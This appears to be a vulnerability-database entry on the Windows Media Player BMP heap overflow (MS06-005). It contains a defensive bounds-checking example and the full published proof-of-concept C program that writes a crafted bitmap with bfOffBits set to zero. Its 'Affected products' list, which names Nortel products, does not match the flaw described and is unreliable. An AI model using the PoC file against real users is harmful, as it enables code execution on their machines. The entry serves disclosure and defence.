Microsoft Windows Media Player Malformed Bitmap File Handling Heap Overflow Vulnerability

Vulnerability ID: 1109764    Type: Buffer overflow
Published: 2006-02-15    Updated: 2006-04-12
CVE: CVE-2006-0006    CNNVD-ID: CNNVD-200602-197
Platform: Windows    CVSS score: 9.3
|Sources
https://www.exploit-db.com/exploits/1500
https://www.securityfocus.com/bid/16633
https://cxsecurity.com/issue/WLB-2006020032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-197
|Vulnerability details
Microsoft Windows Media Player is a widely used media player. It contains a flaw in its handling of malformed bitmap files that an attacker can exploit to execute arbitrary code on the user's machine. Windows Media Player can open and decode bitmap (.bmp) files, but it does not correctly handle a BMP whose header declares a size of zero (the PoC below does this by setting the pixel-data offset field, bfOffBits, to 0). In that case WMP allocates a zero-byte heap buffer but then copies data into it using the actual file length, so the copy runs past the end of the allocation and corrupts the heap. An attacker who persuades a user to open a specially crafted bitmap in Windows Media Player can therefore execute arbitrary code. Microsoft addressed the issue in security bulletin MS06-005.
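The check a decoder needs here, shown as an added example that is not eEye's, ATmaCA's or Microsoft's code: the two BMP headers are parsed from a byte buffer, every size is derived from width, height and bits per pixel rather than trusted from the file, and the pixel-data offset must point past the headers and inside the file before anything is allocated or copied. The sample file is constructed inline with the same header values the PoC below writes (145x99, 24 bpp, 0xA89C pixel bytes, 0xA8D2 bytes total); with bfOffBits = 0 it is rejected, with bfOffBits = 54 it loads. Function and type names such as bmp_validate, bmp_load_pixels and build_sample are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the advisory or the PoC: a bounds-checked BMP header
 * validator and the guarded allocate-and-copy step that follows it. Only BI_RGB 24bpp
 * with a 40-byte BITMAPINFOHEADER is accepted, which is what the PoC file claims to be. */

#define BMP_FILE_HDR_LEN 14u
#define BMP_INFO_HDR_LEN 40u

enum bmp_status {
    BMP_OK = 0, BMP_TOO_SHORT, BMP_BAD_MAGIC, BMP_BAD_INFO_SIZE, BMP_UNSUPPORTED,
    BMP_BAD_DIMENSIONS, BMP_BAD_OFFSET, BMP_BAD_IMAGE_SIZE, BMP_NO_MEMORY
};

typedef struct {
    uint32_t bf_size, bf_off_bits, bi_size, bi_compression, bi_size_image;
    int32_t  bi_width, bi_height;
    uint16_t bi_planes, bi_bit_count;
} bmp_hdr;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Pull the packed little-endian BITMAPFILEHEADER and BITMAPINFOHEADER out of the file bytes. */
static int bmp_parse(const uint8_t *buf, size_t len, bmp_hdr *h) {
    if (len < BMP_FILE_HDR_LEN + BMP_INFO_HDR_LEN) return BMP_TOO_SHORT;
    if (rd16(buf) != 0x4D42) return BMP_BAD_MAGIC;                       /* "BM" */
    h->bf_size = rd32(buf + 2);            h->bf_off_bits = rd32(buf + 10);
    h->bi_size = rd32(buf + 14);           h->bi_width = (int32_t)rd32(buf + 18);
    h->bi_height = (int32_t)rd32(buf + 22); h->bi_planes = rd16(buf + 26);
    h->bi_bit_count = rd16(buf + 28);      h->bi_compression = rd32(buf + 30);
    h->bi_size_image = rd32(buf + 34);
    return BMP_OK;
}

/* Every size the header claims must follow from width/height/bpp and fit in the bytes
 * actually present. On success *pixel_bytes is stride*height, computed here, never read
 * straight from an attacker-controlled field. */
int bmp_validate(const uint8_t *buf, size_t len, bmp_hdr *h, size_t *pixel_bytes) {
    int rc = bmp_parse(buf, len, h);
    if (rc != BMP_OK) return rc;
    if (h->bi_size != BMP_INFO_HDR_LEN) return BMP_BAD_INFO_SIZE;
    if (h->bi_planes != 1 || h->bi_compression != 0 || h->bi_bit_count != 24) return BMP_UNSUPPORTED;
    if (h->bi_width <= 0 || h->bi_height <= 0 || h->bi_width > 0x7FFF || h->bi_height > 0x7FFF)
        return BMP_BAD_DIMENSIONS;
    /* 64-bit arithmetic so width*bpp cannot wrap; BMP rows are padded to 4 bytes. */
    uint64_t stride = (((uint64_t)h->bi_width * h->bi_bit_count + 31) / 32) * 4;
    uint64_t total  = stride * (uint64_t)h->bi_height;
    /* The PoC's trigger: bfOffBits = 0 points inside the headers rather than at pixel data. */
    if (h->bf_off_bits < BMP_FILE_HDR_LEN + BMP_INFO_HDR_LEN || h->bf_off_bits > len) return BMP_BAD_OFFSET;
    if (total > len - h->bf_off_bits) return BMP_BAD_IMAGE_SIZE;        /* promises more than the file holds */
    if (h->bi_size_image != 0 && h->bi_size_image != total) return BMP_BAD_IMAGE_SIZE;
    *pixel_bytes = (size_t)total;
    return BMP_OK;
}

/* Guarded decode step: allocation size and copy length are the same validated value, and
 * the copy starts at a validated offset. Contrast with the bug described above, where a
 * zero-sized allocation received the whole file. */
int bmp_load_pixels(const uint8_t *buf, size_t len, uint8_t **out, size_t *out_len) {
    bmp_hdr h; size_t n;
    *out = NULL; *out_len = 0;
    int rc = bmp_validate(buf, len, &h, &n);
    if (rc != BMP_OK) return rc;
    if ((*out = (uint8_t *)malloc(n)) == NULL) return BMP_NO_MEMORY;
    memcpy(*out, buf + h.bf_off_bits, n);
    *out_len = n;
    return BMP_OK;
}

/* Constructed sample with the PoC's header values (145x99, 24bpp, 0xA89C pixel bytes,
 * 0xA8D2 bytes total, body filled with 0x41); off_bits is the field under test. */
size_t build_sample(uint8_t *f, size_t cap, uint32_t off_bits) {
    const size_t total = 0xA8D2;
    if (cap < total) return 0;
    memset(f, 0x41, total);
    wr16(f + 0, 0x4D42); wr32(f + 2, (uint32_t)total); wr32(f + 6, 0); wr32(f + 10, off_bits);
    wr32(f + 14, 0x28); wr32(f + 18, 0x91); wr32(f + 22, 0x63); wr16(f + 26, 1); wr16(f + 28, 24);
    wr32(f + 30, 0); wr32(f + 34, 0xA89C); wr32(f + 38, 0); wr32(f + 42, 0); wr32(f + 46, 0); wr32(f + 50, 0);
    return total;
}

int main(void) {
    static uint8_t f[0xA8D2]; uint8_t *px; size_t n;
    build_sample(f, sizeof f, 0);
    printf("bfOffBits=0  -> status %d (BMP_BAD_OFFSET is %d)\n", bmp_load_pixels(f, sizeof f, &px, &n), BMP_BAD_OFFSET);
    build_sample(f, sizeof f, 54);
    printf("bfOffBits=54 -> status %d, %zu pixel bytes\n", bmp_load_pixels(f, sizeof f, &px, &n), n);
    free(px);
    return 0;
}
```

The point of the example is the pairing of sizes: the buffer is allocated to stride*height and exactly that many bytes are copied from the validated offset, so neither the header's declared size nor the file length can on its own decide how much memory is written.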
|Exploit (PoC)
/*
* For remote exploitation (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability the payload lands at a different place in memory each time,
* so sometimes it is very easy to reach our shellcode:
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* and sometimes not =) , which is why this PoC carries no shellcode.
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* malloc, exit */
#include <string.h>   /* memset, memcpy */

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;
  DWORD   bfSize;
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;
} BMPFHEADER;

//Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;
  DWORD  biCompression;
  DWORD  biSizeImage;
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);

        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        bmp_iheader->biSize = 0x28;
        bmp_iheader->biWidth = 0x91;
        bmp_iheader->biHeight = 0x63;
        bmp_iheader->biPlanes = 0x01;
        bmp_iheader->biBitCount = 0x18;
        bmp_iheader->biCompression = 0x00;
        bmp_iheader->biSizeImage = 0xA89C;
        bmp_iheader->biXPelsPerMeter = 0x00;
        bmp_iheader->biYPelsPerMeter = 0x00;
        bmp_iheader->biClrUsed = 0x00;
        bmp_iheader->biClrImportant = 0x00;

        memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
        memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,sizeof(BMPIHEADER));

        fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
        fwrite("\x00", 1,1, File); //Terminator

        fclose(File);
        printf("\n\n"  BITMAP_FILE_NAME" has been created in the current directory.\n");

        free(pszBuffer);
        free(bmp_iheader);
        free(bmp_fheader);

        return 0;
}

// milw0rm.com [2006-02-15]
|Affected products
Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Agent
Nortel Networks MCS 5200 3.0
Nortel Networks MCS 5100 3.0
Nortel Networks IP softphone 2050
|References

Source: US-CERT
Name: TA06-045A
Link: http://www.us-cert.gov/cas/techalerts/TA06-045A.html
Source: US-CERT
Name: VU#291396
Link: http://www.kb.cert.org/vuls/id/291396
Source: BID
Name: 16633
Link: http://www.securityfocus.com/bid/16633
Source: MS
Name: MS06-005
Link: http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
Source: VUPEN
Name: ADV-2006-0574
Link: http://www.frsirt.com/english/advisories/2006/0574
Source: MISC
Link: http://www.eeye.com/html/research/advisories/AD20060214.html
Source: SECTRACK
Name: 1015627
Link: http://securitytracker.com/id?1015627
Source: SECUNIA
Name: 18835
Link: http://secunia.com/advisories/18835
Source: XF
Name: win-media-player-bmp-bo(24488)
Link: http://xforce.iss.net/xforce/xfdb/24488
Source: BUGTRAQ
Name: 20060215 Windows Media Player BMP Heap Overflow (MS06-005)
Link: http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
Source: BUGTRAQ
Name: 20060214 [EEYEB-20051017] Windows Media Player BMP Heap Overflow
Link: http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
Source: SREASON
Name: 423
Link: http://securityreason.com/securityalert/423